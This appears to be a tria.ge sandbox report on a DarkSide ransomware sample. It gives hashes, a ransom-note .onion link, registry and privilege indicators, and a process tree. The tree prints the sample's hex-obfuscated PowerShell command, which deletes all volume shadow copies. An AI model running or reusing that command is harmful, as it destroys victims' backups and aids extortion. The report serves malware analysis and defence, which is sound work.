Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
717139a10fd...61.exe
windows7-x64
1017139a10fd...61.exe
windows10-2004-x64
101cc7c198a8...cb.exe
windows7-x64
101cc7c198a8...cb.exe
windows10-2004-x64
10243dff06fc...60.exe
windows7-x64
10243dff06fc...60.exe
windows10-2004-x64
1027214dcb04...8f.exe
windows7-x64
1027214dcb04...8f.exe
windows10-2004-x64
103dabd40d56...a6.exe
windows7-x64
33dabd40d56...a6.exe
windows10-2004-x64
343e61519be...aa.exe
windows7-x64
1043e61519be...aa.exe
windows10-2004-x64
1048a848bc9e...3a.exe
windows7-x64
1048a848bc9e...3a.exe
windows10-2004-x64
10508dd6f7ed...dd.exe
windows7-x64
10508dd6f7ed...dd.exe
windows10-2004-x64
10516664139b...4b.exe
windows7-x64
3516664139b...4b.exe
windows10-2004-x64
10533672da9d...8d.exe
windows7-x64
10533672da9d...8d.exe
windows10-2004-x64
106228f75f52...ff.exe
windows7-x64
106228f75f52...ff.exe
windows10-2004-x64
106836ec8588...d8.exe
windows7-x64
36836ec8588...d8.exe
windows10-2004-x64
368872cc22f...e7.exe
windows7-x64
1068872cc22f...e7.exe
windows10-2004-x64
10691515a485...a5.exe
windows7-x64
10691515a485...a5.exe
windows10-2004-x64
1078782fd324...34.exe
windows7-x64
1078782fd324...34.exe
windows10-2004-x64
108cfd289118...bc.exe
windows7-x64
108cfd289118...bc.exe
windows10-2004-x64
10Resubmissions
27/01/2024, 19:37
240127-yb5pksafd3 1027/01/2024, 19:36
240127-ybqwesafc2 1012/05/2021, 15:56
210512-db4t7vmwas 10Analysis
-
max time kernel
89s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
27/01/2024, 19:36
Behavioral task
behavioral1
Sample
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
27214dcb04310040c38f8d6a65fe03c14b18d4171390da271855fdd02e06768f.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
27214dcb04310040c38f8d6a65fe03c14b18d4171390da271855fdd02e06768f.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
3dabd40d564cf8a8163432abc38768b0a7d45f0fc1970d802dc33b9109feb6a6.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
3dabd40d564cf8a8163432abc38768b0a7d45f0fc1970d802dc33b9109feb6a6.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
508dd6f7ed6c143cf5e1ed6a4051dd8ee7b5bf4b7f55e0704d21ba785f2d5add.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
516664139b0ddd044397a56482d7308d87c213c320a3151ccb9738e8f932654b.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
516664139b0ddd044397a56482d7308d87c213c320a3151ccb9738e8f932654b.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral19
Sample
533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Resource
win7-20231129-en
Behavioral task
behavioral22
Sample
6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
6836ec8588b8049bcd57cd920b7a75f1e206e5e8bb316927784afadb634ea4d8.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
6836ec8588b8049bcd57cd920b7a75f1e206e5e8bb316927784afadb634ea4d8.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe
Resource
win7-20231215-en
Behavioral task
behavioral32
Sample
8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe
Resource
win10v2004-20231222-en
General
-
Target
533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
-
Size
59KB
-
MD5
0e178c4808213ce50c2540468ce409d3
-
SHA1
38b5aa765026dffbb603e323333294b5f5efa5ee
-
SHA256
533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d
-
SHA512
262a8f4808f6c3499c9eb465b480508ed6b082ddd36cf2e618a9455b5abbc2eb6a8d7b7c2f398faaa62ffb22599a8b2eec0d3137fdec648de37ac4a73e6f44f4
-
SSDEEP
768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylgoVHuY23W58:0x7Fu4/ihrhDTV1yljH5Z58
Malware Config
Extracted
C:\Users\README.95b288ea.TXT
darkside
http://darksidfqzcuhtk2.onion/VGBU8VAXXW7EYB5U4KQJXUGU5NT5FP8208W6UXVSKQDAE3CNBR4JTZQCXEZFZWF2
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (168) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\95b288ea.BMP" 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\95b288ea.BMP" 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\WallpaperStyle = "10" 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.95b288ea 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.95b288ea\ = "95b288ea" 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\95b288ea\DefaultIcon 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\95b288ea 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\95b288ea\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\95b288ea.ico" 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4476 powershell.exe 4476 powershell.exe 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeSecurityPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeTakeOwnershipPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeLoadDriverPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeSystemProfilePrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeSystemtimePrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeProfSingleProcessPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeIncBasePriorityPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeCreatePagefilePrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeBackupPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeRestorePrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeShutdownPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeDebugPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeSystemEnvironmentPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeRemoteShutdownPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeUndockPrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeManageVolumePrivilege 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: 33 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: 34 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: 35 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: 36 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe Token: SeDebugPrivilege 4476 powershell.exe Token: SeBackupPrivilege 5104 vssvc.exe Token: SeRestorePrivilege 5104 vssvc.exe Token: SeAuditPrivilege 5104 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3048 wrote to memory of 4476 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe 93 PID 3048 wrote to memory of 4476 3048 533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe 93 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe"C:\Users\Admin\AppData\Local\Temp\533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5104
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5bb925cc5c32a817b61b5a68f00475ac2
SHA1368bbcd93d46036334f385fe80a6315130a873f4
SHA256cab89442f228f263a88d3db648093b2389fa2676ee3f95fccdd7c9574a8e1c11
SHA51269688f4277b0dfdeca560166776ecc74ae2933d6808e849ac60e0eb2310333d37e6216edb23737459a0e2395594a1cd579bccd008499e08526393d96315b4634
-
Filesize
1KB
MD5991de10e06e7eb29dcf1800cbcae69ee
SHA148ff1e6d5efb6c0ac562f68ed971b24e9a7ad3bd
SHA256dbef425ff00001cccdc2b5e2d0aac0022a366e3c2779613d8df9bd8c778e702c
SHA512e9f703d14066091041f2fde4d03b4d5aa7bd292cf344bedc7d448946c3544ca72ee6621aceae7008ebde5d8c7e9dd81b2c927ac9194109240e2dee02486f10a4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD537aecb74544496ba55b7b5f845179642
SHA11f5ab1aba12fc3c26919f59a788381d9fbdbb0ee
SHA2566bc3ec4b4807424a51807d1fb758939bc153ea8bd121217c8996fa45fc8c6181
SHA5129c0321e528ae839ff160e63e920af69209ed7e90a8a36b4c4b95498dfd51bdb0ac58636d609284ee1d5527ccbed0f56e031c0f8f3adf6a385106e740396c2641